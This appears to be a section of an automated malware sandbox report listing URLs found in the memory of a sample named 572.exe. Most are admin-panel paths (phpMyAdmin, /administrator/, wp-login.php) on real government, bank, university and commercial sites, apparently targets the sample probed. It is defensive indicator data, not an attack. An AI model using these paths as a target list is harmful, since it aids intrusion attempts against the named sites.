                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicossociais.caixa.gov.br/administrator/index.php
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicossociais.caixa.gov.br/administrator/index.php6
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicossociais.caixa.gov.br/administrator/index.phpC
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicossociais.caixa.gov.br/administrator/index.phpE
                Source: 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicossociais.caixa.gov.br/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicossociais.caixa.gov.br/phpmyadmin/isgr_inter_8087
                Source: 572.exe, 00000009.00000003.4304769446.0000000040257000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicossociais.caixa.gov.br/wp-login.php
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicossociais.caixa.gov.br/wp-login.php443
                Source: 572.exe, 00000009.00000003.4304769446.0000000040257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicossociais.caixa.gov.br/wp-login.phpeB
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sigapbanjarmasin.info/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sigapbanjarmasin.info/administrator/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sigapbanjarmasin.info/administrator/4
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004068B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sigapbanjarmasin.info/administrator/index.php
                Source: 572.exe, 00000009.00000003.4054751612.000000004068B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sigapbanjarmasin.info/administrator/index.phpJ
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sigapbanjarmasin.info/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sigapbanjarmasin.info/phpMyAdmin/cB
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sigapbanjarmasin.info/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sigapbanjarmasin.info/phpmyadmin/lB
                Source: 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sigapbanjarmasin.info/phpmyadmin/ndes.edu.co
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sigapbanjarmasin.info/pma/
                Source: 572.exe, 00000009.00000003.4347804108.000000004E461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://signin.rockstargames.com/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://signin.rockstargames.com/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://signin.rockstargames.com/PhpMyAdmin/7
                Source: 572.exe, 00000009.00000003.4347804108.000000004E4B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://signin.rockstargames.com/administrator/index.php
                Source: 572.exe, 00000009.00000003.4347804108.000000004E4B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://signin.rockstargames.com/administrator/index.php(
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://signin.rockstargames.com/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ucivirtual.uci.edu.mx/admin.phphp
                Source: 572.exe, 00000009.00000003.4579113128.0000000005628000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ucivirtual.uci.edu.mx/administrator/
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ucivirtual.uci.edu.mx/administrator/edu.co995t
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ucivirtual.uci.edu.mx/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ucivirtual.uci.edu.mx/phpMyAdmin/y
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ucivirtual.uci.edu.mx/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ucivirtual.uci.edu.mx/pma/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ucv.blackboard.com/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004068B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ucv.blackboard.com/administrator/index.php
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ucv.blackboard.com/administrator/index.php.comU
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ucv.blackboard.com/administrator/index.php/index.php
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ucv.blackboard.com/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ucv.blackboard.com/phpMyAdmin/Mg
                Source: 572.exe, 00000009.00000003.4533691780.00000000056FD000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ucv.blackboard.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ucv.blackboard.com/phpmyadmin/Vg
                Source: 572.exe, 00000009.00000003.4533691780.00000000056FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ucv.blackboard.com/phpmyadmin/t
                Source: 572.exe, 00000009.00000003.4579113128.0000000005628000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://upsconline.nic.in/administrator/
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://upsconline.nic.in/administrator/V
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://upsconline.nic.in/administrator/index.php
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://upsconline.nic.in/administrator/index.php.com.br220
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://upsconline.nic.in/administrator/index.php;
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://upsconline.nic.in/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4307098588.0000000006245000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://us04web.zoom.us/administrator/
                Source: 572.exe, 00000009.00000003.4307098588.0000000006245000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://us04web.zoom.us/administrator/e
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://us04web.zoom.us/administrator/index.php
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://us04web.zoom.us/administrator/index.php.
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://us04web.zoom.us/administrator/index.phpex.php
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://us04web.zoom.us/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://us04web.zoom.us/phpmyadmin/:443I
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://v.xsanime.com/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://v.xsanime.com/PhpMyAdmin/y
                Source: 572.exe, 00000009.00000003.4579113128.0000000005628000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://v.xsanime.com/administrator/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://v.xsanime.com/administrator/trator/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://v.xsanime.com/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://v.xsanime.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4347804108.000000004E461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ventas.officeinsumos.com.ar/
                Source: 572.exe, 00000009.00000003.4347804108.000000004E461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ventas.officeinsumos.com.ar/C.
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ventas.officeinsumos.com.ar/admin
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ventas.officeinsumos.com.ar/admin.php
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ventas.officeinsumos.com.ar/admineampowered.com
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ventas.officeinsumos.com.ar/administrator/
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ventas.officeinsumos.com.ar/administrator/O
                Source: 572.exe, 00000009.00000003.4347804108.000000004E4B5000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ventas.officeinsumos.com.ar/administrator/index.php
                Source: 572.exe, 00000009.00000003.4347804108.000000004E4B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ventas.officeinsumos.com.ar/administrator/index.phpJ
                Source: 572.exe, 00000009.00000003.4347804108.000000004E4B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ventas.officeinsumos.com.ar/administrator/index.phpn
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ventas.officeinsumos.com.ar/administrator/index.phpq
                Source: 572.exe, 00000009.00000003.4347804108.000000004E4B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ventas.officeinsumos.com.ar/administrator/index.phpu
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ventas.officeinsumos.com.ar/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ventas.officeinsumos.com.ar/phpMyAdmin/5
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ventas.officeinsumos.com.ar/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4347804108.000000004E461000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ventas.officeinsumos.com.ar/wp-admin/
                Source: 572.exe, 00000009.00000003.4347804108.000000004E461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ventas.officeinsumos.com.ar/wp-admin/hp
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ventas.officeinsumos.com.ar/wp-admin/hp2
                Source: 572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ventas.officeinsumos.com.ar/wp-admin/~)D
                Source: 572.exe, 00000009.00000003.4304769446.00000000401FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vidcorn.tv/admin
                Source: 572.exe, 00000009.00000003.4304769446.00000000401FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vidcorn.tv/admini
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vidcorn.tv/administrator/
                Source: 572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vidcorn.tv/administrator/index.php
                Source: 572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vidcorn.tv/administrator/index.phpQ$
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vidcorn.tv/administrator/ount.live.com252587
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://virtuadopt.com/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://virtuadopt.com/administrator/index.php
                Source: 572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://virtuadopt.com/administrator/index.phpe
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://virtuadopt.com/administrator/index.phpom26
                Source: 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://warriorplus.com/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://warriorplus.com/PhpMyAdmin/d)t
                Source: 572.exe, 00000009.00000003.4307098588.0000000006245000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://warriorplus.com/administrator/
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://warriorplus.com/administrator/net
                Source: 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://warriorplus.com/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4347804108.000000004E509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://warriorplus.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://warriorplus.com/phpmyadmin/%
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4401816982.00000000392B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww1.chainmine.io/administrator/?usid=27&utid=4923801068
                Source: 572.exe, 00000009.00000003.4485883302.000000004DF0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.chainmine.io/administrator/index.php?usid=27&utid=4923801494
                Source: 572.exe, 00000009.00000003.4485883302.000000004DF0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.chainmine.io/administrator/index.php?usid=27&utid=4923801494Encoding:
                Source: 572.exe, 00000009.00000003.4308489219.0000000006196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww16.followerstiktok.xyz/phpmyadmin/?sub1=20240205-2214-549f-9760-a2fba92ef7f3
                Source: 572.exe, 00000009.00000003.4307098588.000000000622F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4196885790.0000000047AF1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4315918557.000000004E1A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.allaboutcookies.org
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.analvids.com/administrator/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.analvids.com/administrator/-
                Source: 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.caixa.gov.br/fgts/index.asp
                Source: 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.caixa.gov.br/mapa/index.asp
                Source: 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.caixa.gov.br/pj/pj_comercial/mp/promocoes_comerciais/index.asp
                Source: 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.caixa.gov.br/seguranca/index.asp
                Source: 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.caixa.gov.br/seguranca/politica_privacidade.asp
                Source: 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.caixa.gov.br/seguranca/termos_de_uso.asp
                Source: 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.caixa.gov.br/voce/contribuicao_sindical/index.asp
                Source: 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.caixa.gov.br/voce/social/beneficios/index.asp
                Source: 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.caixa.gov.br/voce/social/cadastro/index.asp
                Source: 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.caixa.gov.br/voce/social/transferencia/index.asp
                Source: FE8B.exe, 00000007.00000002.2646571313.0000000000A88000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.chilkatsoft.comN
                Source: 572.exe, 00000009.00000003.4306089773.000000004E742000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.claro.com.pe/
                Source: 572.exe, 00000009.00000003.4327514305.000000004D9CF000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.00000000406D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0v
                Source: 1EB9.tmpString found in binary or memory: http://www.innosetup.com/
                Source: 572.exe, 00000009.00000003.4304769446.00000000402DA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4262755230.0000000063EF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.miuniversidad.es).
                Source: 572.exe, 00000009.00000002.4626248458.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
                Source: 572.exe, 00000009.00000002.4626248458.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/support/faq.htmlTYPE=2OpenSSL
                Source: 1EB9.tmpString found in binary or memory: http://www.remobjects.com/ps
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.steampowered.com/steamworks/
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/about
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: 572.exe, 00000009.00000003.4390567048.0000000039199000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D818000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yellosa.co.za/administrator/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yellosa.co.za/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF9000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com
                Source: 572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www2.personas.santander.com.ar/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E64F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www2.personas.santander.com.ar/administrator/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www2.personas.santander.com.ar/pma/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www2.personas.santander.com.ar/wp-admin/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www2.personas.santander.com.ar/wp-admin/O
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www2.personas.santander.com.ar/wp-admin/hp
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4327514305.000000004D9A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www2.personas.santander.com.ar/wp-login.php
                Source: 572.exe, 00000009.00000003.4327514305.000000004D9A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www2.personas.santander.com.ar/wp-login.php)
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www2.personas.santander.com.ar/wp-login.php/index.php
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www2.personas.santander.com.ar/wp-login.php/index.php#
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304582370.00000000404E5000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4072180672.0000000047B2E000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/-
                Source: 572.exe, 00000009.00000003.4304769446.0000000040321000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4299205287.00000000405D3000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4072180672.0000000047B2E000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039194000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/u
                Source: 572.exe, 00000009.00000003.4390567048.0000000039165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/v
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/steam/spotlights/9fa9c4eea9bf3ccc9cb600f1/spotlight_image_eng
